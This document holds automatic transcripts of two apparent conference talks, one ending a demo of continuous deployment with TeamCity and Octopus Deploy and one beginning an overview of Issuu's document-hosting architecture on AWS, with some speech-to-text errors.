and request and download the packages directly. So that helped, but the Octopus server still has to send messages. With 2.0, that will become a truly pull-based deployment whereby the tentacles can just check in and find out if they need to actually execute a deployment. Now I'll jump back over here for just a second. So you're probably sitting there thinking, all right, that sounds great, but you just told me that I now have to go build NuGet packages for all of my deployable pieces of my application. That just sounds like that much more work, right? Well luckily, the thought of that for you, and there's an open source project that the Octopus deploy guys have created called Octopac that is a NuGet package that will create your NuGet packages for you. So you can simply open up Visual Studio with your solution open and say, all right, install package Octopac, and it's going to install some files up at the top of your solution, similar to how NuGet's package restore works, that will automatically, and then it's going to go through, and for each project that you inject it into, it's going to import an MSBuild target. This is great. Whenever you deploy in release mode, go ahead and create a new, you know, an Octopus deploy compatible NuGet package based on conventions. So it goes through and looks at the files in your project and says, cool, I'll grab all these, I'll package them up, create a new get compatible or a Octopus compatible NuGet package for you that's ready to be deployed with your Octopus server. So that can happen just automatically as part of your build process. Now with the, so with your build process, if you're using something like TeamCity, you can automate your build to create and produce these NuGet packages for you so that Octopus can consume them. So let's take a look at that. Real quick, how many people here are using a Continuous Integration server of some kind? Most of you, good. How many are using TeamCity? Most of you, good. TFS, anybody? Okay, that's same. Anybody? The nice thing about this build automation piece is that it can be done with any Continuous Integration server. It's not specific to TeamCity, although Octopus does supply a TeamCity plugin to help make some of the interactions easier. All you need to do is build your code continuously, run your tests, and ultimately publish those NuGet packages that get created by Octopack out to some NuGet feed somewhere. It could be a MyGet feed that you have out on myget.org. It can be TeamCity's internal NuGet feed. It can be a file share inside your firewall that can act as a NuGet feed. But you can do it with Jenkins or Hudson or, I mean, cruisecontrol.net if you're glutton for punishment. But we're going to use TeamCity because I find it pretty easy to configure. As you'll see here, I've got a Continuous Integration build. This is configured to build every single time I check in code and run all my tests, of which I don't think I have hardly any, and I'm a bad developer. And then ultimately produce a NuGet package as its build artifact. And since TeamCity has the capability to publish any build artifacts to an internal NuGet feed right off the server, if you're running TeamCity, you've already got it. You just say, okay, cool. You can build NuGet, and whenever you produce build artifacts that are NuGet packages, as I've done here, it will go ahead and add those to the NuGet feed coming off of here so that they're exposed to Octopus deploy. Once those packages have been built, you can come over here to Octopus deploy. And say, great, I want to create a release. And it tells me, hey, my last release was this. So I know what I'm doing version-wise. It goes ahead and looks, as you can see here, at my TeamCity feed that I have it configured to pull packages from and finds the latest version. Or I can come over here and say, well, no, I want to do a specific version of this package because we found a bug in 1.34. So let's release 1.33 for this. I'm just going to do the latest version. I'm going to call this 1.0.34.1 because I can't use the same version number again. And I can add some release notes. Do you see? That will show up to anybody who looks at this release. Markdown is supported in here. So you can put some pretty nice release notes in there for people to go view them on your Octopus portal. And I've created the release. Awesome. Where did it go? It didn't go anywhere. It has the idea of creating releases as a declared, hey, this is a release I want to create. Here's the versions I want you to use. Here's the release notes. That's everything before you ever actually deploy it. So you could create the release and you could come back and edit the release notes and stuff before you ever deploy it. And then to go deploy this release, I'll say great, I want to deploy this to development, go. And it's going to go run my deployment again. Well, that's great. But remember when I said that a really good continuous delivery system is highly automated? That didn't feel very automated. Somebody still has to go and create these releases and all this stuff. And it's prone to them picking the wrong package version and all that stuff. So what we really want to do is utilize OctopusDeploy's REST-based API in order to automatically create and deploy our releases. I'm going to do that using the TeamCity plugin that OctopusDeploy provides. They also provide a simple command line tool called octo.exe, which is what the plugin uses in the background, that you can automate yourself in any other continuous integration system. And if I look at the configuration settings of my build here and go look at my build steps, I've already, you know, I've cheated and I've already configured this ship it step. So I'm going to enable that build step and I'm going to run my build. And what this will do is run a build with TeamCity. As you can see, it's already starting to run. And go ahead and use the OctopusDeploy API, or the built-in Octopus plugin for TeamCity to talk to Octopus's API and create a release with my build number and the version of the packages that I just created and start deploying it. So let's see here. We are building. We are on conference Wi-Fi getting code from GitHub that hasn't actually changed. And it's going to run my build, go out and do all this. Great, here we go. And now it's running OctoPack. We'll go in here so we can drill into the details and see what all it's actually doing. So here you can see the OctoPack step. You can see the MS build message is coming up there from where OctoPack is automatically creating my NuGet packages without me really having to configure anything. And once it gets done running this build, it's going to move on to step two, which is going to be talking to the Octopus server. And what we're going to find is that this right here, I predict failure. This is a, I show this for a reason. This step is eventually going to fail. And I'll tell you why. In case you guys go back and start using your TeamCity and your Octopus deploy to try to set this up and say, great, we've got this automated build. It's just add a build step for Octopus deploy. That looked nice and simple. Well, the problem is that this is dependent on the artifacts of the build. And sorry, this is taking too long to fail. You can see on my dashboard we can see a deployment is running. Eventually it's going to fail. The problem that we're running into by just creating this build step right here, you know, well, great. And a URL, a key, a couple of settings, is that this is now dependent on the artifacts produced by this build step right here. But they're all part of the same build configuration. And in TeamCity, the build agent doesn't publish its artifacts back to the server until it's finished all the steps of the build configuration. So when I first tried to enable this whole scenario, I did this right here and I kept getting that Octopus deploy had failed because it couldn't find the packages. See, there we go. And I'd come here and I'd say, great. It's trying to download the packages. And it says, hey, I couldn't find the package version you specified in that NuGet feed. And I was like, yeah, it's built. It's right there. And the fun part is that now that this has finished, it will have published artifacts at this point. So now if I come back here and say, try again, it'll work, which will lead you to bang your head against your desk repeatedly because it'll keep happening in that same cycle. Every time you push to the continuous integration server, it runs a build and it fails to deploy. And then you click try again and it deploys like a champ. And you go, what's going on? That's because there's a dependency chain here that I didn't think through well enough at first. And once I finally figured it out, I realized you've got to have your Octopus deployment step happen in a separate build configuration. Now, remember I told you before that you can create a release and then deploy it. So if all you want to do is have your continuous integration server create the release but not deploy it, you can put it all in one step like we did already. And that'll be fine. It'll create the release because you're not actually trying to download the packages yet. And that's fine. So let's go, nope, that's not what I want. Let's go in here and disable that build step that did not work and take a look at our deploy to development step. So this, I've taken a snapshot dependency on my continuous integration build here that is going to say, hey, great, this build is basically linked to the point in time snapshot from source control that the other one was. That way I know that it's running against the same version. And really, that's mostly just a trick in order to try to get this deployment build number. It's the exact same build number from my previous build for this build. The real fun part here is the build step for Octopus deploy. So I've created, I've selected the Octopus deploy release. There's also a promote one that will take a release you've already created and push it to another environment. I don't know if that needs to be automated. It's only one click in Octopus. And it's going to, I just give it my URL, my API key that I got out of the Octopus server, which project I'm working with for the release number since I have TeamCity creating semantic versioning style release numbers. I'm just going to use my build number for that. That's an important note. Octopus deploy depends on you using semantic versioning for your packages and for your releases. And here's a fun tip for your package versions. Make sure that you are using all four semantic versioning sections. If you use less, it will fail to find your packages when it downloads them, which is a fun bug to trace. And I tell it, all right, don't just create the release. I want you to deploy it to my development environment. And I want you to wait for the deployment to complete. And then pro tip, package version equals. This is telling it, hey, I want you to use the same build number from my build for all of my packages. Otherwise it defaults to using the latest. And there can sometimes be a slight delay in how quickly TeamCity publishes the packages out to the NuGet feed. And I've had to, on some larger projects, build in a little manual sleep step to tell the build server to sleep for 30 seconds to ensure that TeamCity has had time to get those out on the NuGet feed. Otherwise, if you don't have this, it will deploy an old version of your code and you'll go, how did that happen? If you have this, your build will fail if it can't find the step, which is exactly what you want it to do. You don't want it to tell you, hey, I successfully deployed build version 1.0.35 only to find out later that it had 1.0.34 of the API in it. It's no good. So with this configuration set up, I can now run this build and it will trigger a build chain that will run a continuous integration build and then run the deployment step to actually deploy the results of that continuous integration build out to my development environment. What I typically do is configure a build trigger for this that says, hey, on every check-in, go ahead and deploy to development. And that way, the developers can get out there on the dog food server and check it out and make sure it works against a large data set, you know, whatever. If you have a large team that's committing really frequently, that might be too much. So maybe you want to do it hourly or maybe you want to do it nightly. But this starts to really get the nice automation piece of your continuous delivery cycle. What you get here is that on some regular interval, either every time I push code or every hour, every day, that code from all my developers is getting scooped up, built, tested, and deployed to the development environment so they can go run tests against it. And maybe even after it's deployed to your development environment, you might have another build step that kicks off that goes and runs some, you know, PhantomJS or Casper testing to do some automated UI testing against that and further validate it. And the point being that once you've done that, all right, great. See, this all ran automated and I've got this nice deploy and now look, 1.0.36 went to development. Great. So we're constantly pushing out to that development environment, which means that whenever QA comes and says, hey, we're ready to start testing for the next release, all right, cool. One click. I come in here. All right, well, to be fair, maybe it's like two clicks because I'll click on that and then click promote and then click go. But still. Now I can go ahead and promote that. I think I selected development though, so that's no good. Anyway, I'm redeploying it to development, but had I done it correctly, I would have selected UAT and said, great, there you go, QA. Now you've got the exact binaries that we just told you were ready to test out there in your UAT environment, ready for you to start hacking away on. And as you can see, oh, I guess I haven't showed you that this is actually deploying our app. Here we've got our development environment. And as you can see, I've added the versioning here. So it's pulling the version off the DLLs. 36 is here on our UAT environment. You see I've got 1.0.28. So let's go ahead and make sure we promote this out to UAT. Deploy that release. And once that finishes, we'll be able to verify that we've got the right version out in our UAT environment. Now you might start asking yourself right now looking at, hey, hey, can I make sure that it follows a particular workflow? Can I enforce that a release has to go from dev to UAT, it can't go from dev straight to production? Unfortunately, no, not right now. That is a 2.0 feature that's currently being built. So that part is going to come where you can say, oh, great. You can't release something to production unless it's been through UAT or unless it's been through maybe you have three different UAT environments that represent different platforms you operate on or something. You can force it to go through test cycles on all of that before it gets out to production. So now that we've completed a deployment to UAT, we'll look and say, great. Here we go. Now we've got 1.36 in UAT. So we've still got 1.28 out in production. Let's go over here and just to show the approval process, we will promote this to production and say, OK, deploy this release. So what will happen here is it's going to start and it's going to go and download the packages and get all ready to deploy. It's going to make sure everything's ready to go. I'm ready to execute this deployment and then boom, it stops. It says, hey, approval required. Now I happen to be a member of the group that can do the approval, so I get the procedure cancel buttons and I can put approval notes in here. If I were just Joe developer without access to that, then it would just say, hey, approval is required from a member of this group, whatever group you've defined in Octopus. And that production deployers or release managers, whoever. So I'm going to say here, go. Awesome. I have just authorized that and it shows in here, hey, it was approved by Jeff French with these notes. So maybe your organization has a really sophisticated change management system that you have to put in a ticket in order to do a production deployment and get that approved. You could put your ticket number in here so that they can refer back to that and have some traceability into it. So now I can see, all right, great. This was approved by Jeff French. That's awesome. And then I can go and see what it actually did to do the deployment. It went and found the package and it outputs all the stuff. Here's all the variables that it's going to use in order to actually execute this deployment. Here's the XML transforms that I've performed. Here's the IIS website that I updated. It gives you all this information. And then your deploy.ps1 scripts or all your ps1 scripts, you can just pipe any output of any commands to the right host command and that will show up right here in the same log. So you can see all your info there. As a matter of fact, a good example of that is on the service bus. You can see here that it went through and here's the messages from my deployment service saying, all right, great. This is what happened. So you can output anything you want to show up in these logs and they're in one nice central place. So yes. You also do a test deployment to check everything before you actually deploy the code. Well, no, there's not a feature. I'd never even thought of that before, actually. There's not a feature for that currently. I'm trying to think how that would actually operate because it would actually have to perform a lot of those steps in order to get any of the logs, you know. But some of it you could probably do and not actually alter IIS or whatever. But if it's executing your deployment script, that's going to go ahead and get up there. So, all right, that's what I've got for today. You guys have any questions? Any more questions? Yeah? Yes? It can. The way I show it being automated, it always uses the same version for every package. But if we look back at the, well, I'm going to have to change around too much. But when you saw that when I manually created that release and I got to select which version of the packages I want, that's a scenario where you would want to use that. You would want to say, okay, great. We're only pushing out the website. So let's go ahead and select that version. And then you can also, on each one of those deployment screens, you saw every time I selected to promote it to a new environment, there was a list of check boxes there. That was all of the steps. And if you check one of those boxes, that step will be skipped. So I can say, okay, great. Skip the database because we don't have any database changes. Skip this, skip that. And let's just deploy the website. And that way, and like I do that quite frequently so I can deploy changes to just one section of the app without affecting any of the rest of them. I think that's only manually. You can't have it sort of check the version. Oh, no. There's no automated way for it to say, hey, there's no new version of this. Now that's something you could build in the way that you create the releases. The Octopus default thing won't do that. But you can use the API, you know, in building your automation piece that says, hey, if the version is the same as what's already out there because you can use the API to interrogate which versions have been deployed, then don't do it, you know, so. Yes? What's the rollback strategy? There's not one. Essentially, there's not an automated rollback strategy. Now you saw when we looked at the deployment scripts, there was a deploy failed.ps1. That will only be called if one of the steps previous, all the way up to the post-deploy.ps1 step fails in some way, you know, if you have a PowerShell exit code that's non-zero and or anything else fails, then it will execute that deploy failed.ps1. Now in there, you could try to do some fancy stuff. I know there was a request at one point to the Octopus guys to say, hey, can you make the previous deployment version number available to my deploy ps1 so I can automate the rollback? And that's really a tricky, tricky piece to do. So they haven't got it worked out just yet. So right now, the rollback strategy is the fact that it deploys each version into a separate application, into a separate folder, so you would go repoint your application. But more than that, because this deployment process is repeatable, you would just go run it, go redeploy your previous version. And it will go back and run your deployment again and have everything back the way it was. Yes? If you don't have fully automated pipeline like the manual UA, and you want to build your pipeline. Right. And so you will say, change the source of the UA. And then UA, and then you will say, just look. So it's hitting down the pipeline. Are there any ways to build your previous version? If anything around it? Yeah. So what you could do, if I'm understanding what you're looking for correctly, is that you're saying that in your deployment, you would execute a certain part of the steps, and then QA would step in, smoke screen your stuff before you turn the load balancer back on, that type of thing. Yeah. What you can do is you can use the manual steps for that. So like you saw, I had a manual step at the beginning. I could put that anywhere I want. So one thing I've done in the past is say, okay, great. Right before my PowerShell step that's going to bring this node back into load balancing, I'm going to have a manual step there that says, hey, someone from the QA group has to sign off that this is good. And maybe right before that manual step, I'll have an email step. I didn't get a chance to show that part. But the other step types you can use in Octopus are an email step where it will send an email to a certain set of addresses to notify, hey, this deployment's happening, or hey, this deployment's been done, but you need to smoke test it before we go live, you know, or something. So that's how you would kind of implement that currently. Yes? So we've got all the devices that have access to the source team. We go out and deploy the components to the source team. So that's what we're going to do. Couple things. Number one, we've got the variables with permissions around them. So you could specify, you know, your scripts could rely on pulling that variable out of the Octopus portal and make it so developers don't have access to that password. Okay. Are we good? Yeah? Is it? All right. Anybody else? Oh, yes. Sorry. It's bright. Yes? Yes? Yes. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay.
|
One of the main tenets of Agile development is to deliver business value to the production environment early and often. That's easy enough if you are delivering one small web app, but what if your application is composed of several web apps across multiple tiers with a large database and maybe even a few Windows services and scheduled tasks? Now you need a deployment system that is built to scale and allows you to automate all of these tasks to achieve consistency in your deployments. In this talk I will show you how to deploy a complex application to multiple environments with just the click of a button using TeamCity and Octopus Deploy.
|
10.5446/51436 (DOI)
|
Okay, but welcome to this presentation. So what we want to talk about today is stuff we work on at this company called Issue. My name is Jesper, this is my colleague Martin. I just wanted to ask if any of you have ever heard about Issue before? No? Okay, it's kind of a small crowd, so perhaps that's not so representative. But anyway, we want to show you about our company issue and what we do, and it will be a lot about the practical examples of how we run things at web scale. We have a lot of traffic on our website, and we just really want to show you what technology worked for us, what didn't work. So it's a lot of practical examples of those things. Great. But actually, let me just show you what Issue is to put it all into context. So somebody that did know what Issue was was this conference, because they actually uploaded this publication to our website. So Issue is a website where you can upload printed publications and then have this nice reading experience. And then you can take this thing and embed as a widget on your own website so that you can kind of have an easy way to distribute printed stuff on your own website. How you can use this reader, and then if you scroll down below, you can see kind of related documents. And what we're going to talk about today is all this technology that lies behind this, how we serve up to all those users and how we create relevant. So Issue is kind of a technology platform where publishers will have some printed publications that they want to upload, so they will do that, and they usually have a need for it, like embedding it on a webpage. But what we then do is that we keep that document on our website and make it available to people that just visit us. So just as on YouTube where you can go and find cool videos, then you can go to Issue to actually find cool publications, because we have all these publications that people uploaded to us because they needed to use it as a tool. That means it becomes kind of an ecosystem where publishers upload content, readers kind of read it, then somebody can curate that and create nice stacks of interesting content that they can share with their friends. And we have some tools for market seers that can get more readers, and more readers means that more publishers want to upload stuff to us. So that's kind of the circle that we get more and more publications. So just to give you some numbers here, at this point in time we have around 12 million publications. We're getting approximately 25,000 new publications per day, 7 million written-statusers. In this talk we're also going to talk about how we track user behavior. So those statistics we get about 15 billion statistic events per month and 4 billion of those are impressions. We have 7 million unique visitors to the website, which actually makes us just outside the top 100 websites in the US. It's pretty cool. Average visitors use 7 minutes on the site. And actually last, recently we just released a version for the iPad and tapped it, and that kind of increased the reading time significantly. So it seems like what people want to do is to sit in the bathroom and read publications or relax in a sofa setting. Great. So what is the agenda for today? As I said, we have a lot of technology. We could have talked about lots of things, but we handpicked some things that we believe could be interesting to see examples of. So we'll talk about the upload process, how we convert stuff, what architecture goes into that, how we use some machine learning to make recommendations for when you're reading stuff, what could also be relevant for you, how we scale the whole delivery of content to clients, and then at last the consumption tracking. Great. So let's stop with the publication upload. So you're a publisher, you have a PDF file, you upload it to us. It goes into this magic bubble that is essentially just a huge tool chain of all kinds of weird open source tools and in-house tools. We found like PDF2xml, LibreOffice, and so on. That does all kinds of things, and then essentially makes it available in the reader. So there are around 24 pages on average, and the processing time in that tool chain is then one to one and a half minutes on average. Sometimes people will upload insanely huge PDF files, and also the PDF format is really not that well defined. You can have all sorts of weird tools that will create weird PDFs that will break the tools and so on, but more about that later. So how does the infrastructure look? So this is a drawing. So first of all, we're using Amazon Web Services on a huge scale. I think right now we have around 300 instances running. So Amazon is quite happy to have us as a customer. So the infrastructure here is that a client sits in his web browser and wants to publish a document, and he then hits the elastic load balancer. This is an Amazon thing that essentially just does round robin to hit these converter instances. We'll dive into how that looks later. The point is on these converters, the client uploads the document, and one pattern we've started with was to upload the document to the Amazon storage called S3, but we found that that was actually too slow. So what we do instead is that we upload straight to the local file system of this converter process, and then once that is done, a background task actually puts it into storage. So that huge tool chain that is running here, as I said, it can break because we're not really in control of all those tools. That's just how it is when you're using a lot of tools you're not in control of. So we kind of expect this to fail often. So therefore we have this monitor thing that kind of have a look and monitors and see if this stuff breaks, and then it will retry and put it on to another server. We're using AMQP technology to send messages. Martin will talk a bit later about the architecture of that. Yes. Another thing, right now I think we have around 100 of these converter instances, but the monitor will actually also have a look at the load. So each hour it will kind of very flexible with Amazon Web Service technology to turn the knob up and down in regard to how many servers we actually have. Another thing we found was that using Amazon's AMI to boot the servers was actually very, very slow. So what we now do is we boot them from EPS. That's just trial and error that we found that worked really well for us. We can boot them quite flexible to kind of handle the load in a dynamic way. But if we dive in through how this converter thing actually looks, ah, yeah, great. Yeah, so we're trying to keep around 30% spare capacity. And the monitor here is created in Python. Python is a language we use a lot to kind of glue stuff together. We found that it works well for us. Great. So the architecture of the individual converter is kind of the same thing where we have this monitor thing, but now it just monitors the individual converter processes. So this, that huge tool chain will try to spawn as many of them in parallel as possible. But then you also run into stuff like some of the tools really don't work that well in parallel. If you spawn two versions of LibreOffice, it will share the same temp files and weird things will happen. But we try to fire up as many as possible and the monitor will then keep track and see if things need to be restarted. The client hits NGNX at the top because that's an SSL termination point, so they can upload over HTTPS. The tornado then transfers the HTTP request into Python and puts it on a task queue. And then all the results of the conversion tools ends up on a local file system and eventually on S3. Yeah, as I said, you're not really in control when you just have a huge tool chain of tools you have picked. Great. So what comes out of the conversion process? So first of all, we extract the actual text file from the PDF. We can use that in the search infrastructure. Martin will talk a bit about that. We need the page sizes and PDF metadata. Document type is something we made ourselves. We are seeing if we can do something about finding explicit documents. I mean, people will upload all kinds of weird things and they are not that nice about saying that it is explicit. So we try to detect that ourselves. But eventually per page we will end up having some Swift file because the reader you saw before is written in Flash right now. We actually do want to experiment with HTML5, but for now it's Flash because that gives the best kind of reading experience with nice animations and so on. And we'll have some fun things for the website. So as I said, we have around 12 million documents and that makes up for around 250 terabyte worth of storage right now. So that's another reason why Amazon is happy fast because we have paid them a lot of money for storage. Great. So that was what I wanted to say about upload. Actually if you have any questions along the way, I mean, this is a small crowd so you can do more than have it and just shoot and we'll take them. Any questions for the upload thing? Yes? If you're uploading direct to the converters, do you have a much dropout of those? If you lose instances? Sell them. Yeah. People are just happy to retry the uploads. If it should happen. So there are two reasons why an upload could fail. One reason is that you should be crashing the structure because your PDF is sick or, I mean, malformed or something, password protected. That's the most common case for failure and we seldom see that instances just crash. I mean, that happens, of course. And if that happens then and you haven't uploaded the upload of the PDF itself is not finished and we've lost them, you have to restart. And once the PDF is there, then we have it in local storage, we've shipped it off to something durable as three and then we can restart on another host. So another point is that the client actually keeps a connection to the host at all times which means that it can show a progress bar of how far in the conversion process it is. So we actually have a special version of that reader that, so you can, for example, flip to page 100 before it's actually converted and then it will schedule that page to be converted before the other so that if you want to look how something specific works, you actually can do that during the conversion time because it can take several minutes to do that. So that's another reason to keep the connection. Great. So let's talk a little bit about machine learning for finding recommendations. So I showed you before when you're reading a document, it can show you other things that might be interesting for you and since we have this ecosystem, so we want to cater for the publishers, give them a nice upload and tool thing, but we also want to cater for the readers and give them a great experience where they simply find that issue is a fun place to be, to find cool content. So how do we actually do that? Take in some publication, doing some magic and then making recommendations. So one thing is we can ask the uploaders to actually put some tags and descriptions and that. So first of all, it will be quite bad what they write or it will be plain wrong because they'll just write foobar, foobar, foobar because they are lazy or they don't want to do it. So our experience is really that you cannot rely at all on users of made things. People just want to drag and drop the thing, see the upload complete and then move on. So we want to actually impose machine learning. So what would a human do when you're reading a magazine like this? You'll take a look and think what is it related to, what does it feel like, what does it mean? So we want to try to build kind of a mechanical brain and the approach we took was to build what's called a topic model. So that's actually some roughly 10-year-old technology called latent direct-click allocation, French guy. Actually, it's open source and available on the web. You can go try it out. This was just the route we took to try to build this mechanical brain. So we need to build this topic model. I'm going to explain kind of in a few very high-level steps how this works to just give you an idea about what goes on behind the scenes. So what we did was we took Wikipedia because that's actually a large, publicly available text corpus that had information about a lot of things. And what we want to do is the topic model needs to find relationships between topics. So on Wikipedia you have around 100,000 words. You can get out of that and you have a lot of articles that you can then use the algorithms to kind of find the relationship between those words and those articles. So the first thing you need to do is to get a sanitized word list. And on that LDA website I showed you before, there are tools that can actually do this. You give it some text and it will give you a word list. So out of Wikipedia we got 100,000 words. English words. It was the English Wikipedia we used. And then we inspected it a bit and actually found that 15,000 of them were not English. And that's really bad because then later on in the process, if you have something in Spanish about cars and something in Spanish about travel, then that will be the same because it's in Spanish. But that's not really relevant, right? That's not related. So we took out all the non-English words. Here are a lot of Russian examples. And the same thing goes for names. That really doesn't fit in this model. So the first step is get a word list. The next step is then that you run this huge magic thing that is the LDA algorithm and it kind of looks at all the individual articles on Wikipedia. The good thing is that each article is kind of about the same subject, kind of about the same topic. So the output is really just this huge list of weighted words, how they relate to each other in the articles. I know this is a bit confusing, but just consider that this is what you get out of the algorithm. One thing you do provide is that you tell it how many topics do you want and we just chose a number. And I mean, there's a lot of trial and error in this. So we just think we tried to do 100 and 200 and ended up using 150 topics. And this is kind of what a topic looks like. It's just a listed weight of words. And if you then expect documents that kind of fit into this, then this is done by manual inspection. You can see, okay, this is documents that fit this will be about raising. So this is a bit abstract. Let's try to look at this drawing. Okay. Just a more example. This is an example of some of the topics and we just named them. You don't really need to know the names, but just as examples about what that algorithm found. It's also important to know that, I mean, we used Wikipedia as the input, but if you use something else, this will be entirely different. So it's a very kind of organic mechanism. There's no fact or any one way to do it. It stands for latent, derythlic allocation, diracle, that's a name, allocation. It's the statistical model for finding topics given the corpus of text. Yeah. So I think this slide kind of shows it a bit more intuitively. So yeah, that's why you do that by manual inspection. It turned out after we run this algorithm, it produces 150 topics and then we look at the words which went into Germany one and it contained words like Berlin and Volkswagen and other things that might be connected to Germany somehow. So it's just an artifact of the process. It chooses these things. It says these things go together. We can inspect what these things are and then we can attach a name. All this must be stuff that has something to do with Germany. Yeah. There's another Germany too somewhere. And the point is you don't really need, you don't really use those names for anything. It's just to kind of get an idea about what kind of topics did you get from that text corpus you used. I mean if we had used something else in Wikipedia we would have gotten some other ones. This drawing shows it a little bit more intuitively. So you get a document, a PDF file in and then you translate the text to English because we used the English text. So there comes another problem. How do I translate fast enough to handle 25 documents per day and so on and so on. That's a whole other story. But assuming you get some English text from the PDF you can then run this model and then what it does is it kind of looks, oh, whoa, that's a stage. It looks into all the words in the documents and just counts them and kind of on all those 150 different topics it kind of sees how relevant they are. So you kind of get this DNA fingerprint that says, okay, this document has this fingerprint distribution. You can say that in an intuitively high level fashion. Yes, that is correct. So what you then do when you have a publication that has this fingerprint is that you can actually essentially the 150 topics is like a 150 dimensional space. Once you have stuff in the space they will have a position in that space. So just to cap up, we built the topic model using the Wikipedia text and then we ran this on all our documents so all the documents got this fingerprint which is essentially then a place in this huge 150 dimensional space. I was just shown here as a 2D thing for illustration purposes. And the point is once you have them in the space then you can actually calculate distance, right? And distance is kind of a similarity thing because of all those topics things that have a huge thing on travel will kind of be placed in the same area in that space. Does that make sense? But the problem now is that then you have 12 million documents, right? And then each time a new document come in you need to calculate 12 million distances which is kind of computationally very heavy to do on the fly. So the next step we took was to actually cluster this space using the K-means algorithm. It's essentially just a clustering algorithm that you provided a number and say how many clusters you want then it iterates until everything kind of settle into place and you get these clusters in the space. And then you only have 3,000 cluster centers that you need to kind of when you come in with a new document you just find which one of those centers are your closest to and then you say okay you are in this segment. And then it becomes very easy to find relevant things because you just choose another document inside this segment. So then it's very fast at runtime to actually get relevant documents. The problem then is that those 3,000 I mean there was just an arbitrary number we picked out of thin air or a little bit of trial and error perhaps we had some technical requirements at the time but what we have found is that it is actually a bit cost to only have 3,000. So what we are experimenting right now is to actually switch to using 100,000 perhaps even the 200,000. But it is a bit something you just need to experiment with and see how well it works, right? Because you can't really make an algorithm that says how relevant something is. You kind of need to look at it and inspect it and kind of have a look at all the documents in one segment and see how relevant are they. But it does kind of work okay for us. Let's just show a quick example. So here we have a fashion magazine and if you scroll down at the bottom these are examples of stuff that are provided in the same segment as that. That looks pretty much fashion. Great. Any questions to this one? Then I don't know, I think. Yep. Okay. So I am going to talk a bit about how we actually deliver publications. So we have now seen that we can read a publication on issue. We can see how we can as a publisher I can upload a new application to issue. We can see that we can pull out various artifacts and now I am going to talk a bit about the architecture that goes into delivering a particular document. So this works like that. Okay. So reading a single document as seen from the reader experience as you on your browser, your client, the client first connects to www.issue.com and that's just a web server. It serves up the containing web page. No assets yet. Just a container, some JavaScript, a lot of other stuff. Then we have what we call an API server over here. Basically the client needs a whole number of APIs to populate the page and these are all exposed through this host and this could be stuff like logging on a user, getting an authentication token, querying if the user has rights to do this and that. Within my login credentials what is the metadata related to me. All these kinds of queries can be retrieved to this server and it uses a whole set of backend systems of which we use MySQL to host, to store details about users, details about the documents that we have. But there are also other places that we store stuff and retrieve stuff from depending on the user's patterns that we have. Once we've talked up here the client can then connect to what we call the stream servers and as you saw in the reader before it had a reader experience where you could flip pages and below that it had the set of related documents. That's basically a conceptually infinite stream of documents which are related or we have other kinds of streams. I'll show you some in a while. But these stream servers are responsible for serving up that part. Then there's all the heavy lifting of delivering all the assets to the client, delivering the swift files with the flash player, delivering all the images in various resolutions, delivering all kinds of stuff. That basically goes on to S3 which is Amazon's very durable storage solution. It's fairly slow in terms of individual bandwidth. It takes a while to use HTTP so it takes a while to create a connection and get the content and download it. But it scales really, really well. So you can have an enormous amount of clients that read from S3 simultaneously and also S3 integrates very well with content delivery networks. We use CD networks as our content delivery network such that it's a very convenient process for us to basically just upload stuff to S3 and then point the CD to Amazon and it'll transparently to us be distributed to a server near you. So I'm going to now zoom in on various bits here. So let's start with the web server. Sorry, yes? I'll get to that. She asked about, well, one of the things that happened during the upload was that documents are categorized into clusters or segments as we talked about. I'm going to show you how we use that in a while. I was talking about security, how if I know the URLs that you speak, can I get a picture without having access to them? Yes. So the URLs are just security based on? Well, I mean, if you use a proxy on your local host, you can see all the URLs. So basically a URL for a thumbnail for a document cover is public. You have to be able to access it from your browser anyway. We are fine with people getting that. What do you think would be the security problem? It's publicly available information. But the license might be... You provide, when you log in, could be over some suitably encrypted connection and you get a token. So all the secret bit goes on server side. You only get an authentication token. Yeah, the S3 server will check that token. No, because everything that's over here is in the clear. So I mean, but you could have an HTTPS connection. I mean, we support HTTPS. So if you're worried about middle attacks and that kind of thing, then... No, I don't. I was just thinking that I should get access to one of the... One of the consents if I didn't have the license to see it. No, okay. But like on YouTube, the content is public and stuff. And it is possible to have private or unlisted content on issue and the access key is the URL like on Google. So the license might have more control stuff like functionality in the reader. Like if you pay for... You have a product where you can pay to remove the related stream, for example. If you have a catalog for furniture, you don't want other furniture companies below you. Then you can pay for that. And that is then functionality that the reader will use the secure API connection. Okay. So let's zoom in on the web server part. This is a very standard pattern that we use over and over again in issue to scale. We try when we do stuff to use multi-availability zones so that we can have failover. And you will see that quickly that that's a problem here. I'll get back to that in just a second. But clients will connect to what is a proxy server. Again, as in the content upload part, we use engine X SSL termination and also use it to serve up these static assets that have to be there always on the web server like the favicon.ico and for flash readers cross domain.xml and other little annoying static files. And once we get inside and we are just a normal HTTP on the other side, we use HA proxy as a load balancer that will then distribute load out to a number of web servers. And for serving up this part of the website, we use Node.js. Basically, we can make do with just having three servers. In Amazon, we use M1.large, which are really pretty small machines, two core machines, and we run one instance of Node.js on each of those. And that works really well for us. The problem here is that in terms of security, we only have this available in one zone. We could use the Amazon elastic load balancer, but the problem is that then you do it does it on the HTTP level. And down here, we want to do IP tables on the IP level. So if we use the elastic load balancer in front of this, we would have to do filtering based on the X forwarded for rather than directly on the IP address, which we can see down here. So a way that we are working on investigating for having several availability zones and a full failover is to do a dynamic DNS assignment so that this could be replicated over here and have the same name, but the DNS would be swapped so that we could have full failover capability. And that's something that we're working towards. So let me just go back here. The API service I'm going to zoom in on now. Yes? So we have a really strong plan on that. Well if we had something which could do dynamic DNS allocation so that when you looked up www.issue.com, it might resolve to one of the other availability zone. And that thing is one of Amazon services that would then detect if one zone was down and then only give the other one. Yeah, but it has to do with DNS, your IP. Then you would have a short problem I think. Yes, so then what I do is you can cut down on the timeout. Yes, yes, I guess that would be a way to do it. But we're not doing it yet, but we're going to do it and that's one of the issues that we'll have to look at. So API servers, these servers that fulfill all of the APIs that the clients need to populate the web pages, again, same model, proxy here that go to API servers. And these get a lot of requests which are fulfilled from various backend systems, MySQL and others. And we have chosen to implement this in Erlang. You all, have you all heard of Erlang? Yeah, okay. So Erlang is a functional programming language. I happen to love functional programming languages. I think they're pretty neat and a nice way of developing. And Erlang has this concept of you fire up a process and that then lives in a tree of supervisors such that the process has a parent which checks to see if it's alive. And if it dies, for example, if it's given bad data or there's a bug in there or something, then the parent can respawn it. And the parent can also check to see, has I have I respawned this child five times within the last 30 seconds and something is maybe seriously wrong and then I can die myself. And then the parent can have a grandparent which can then supervise. So you get these whole trees of 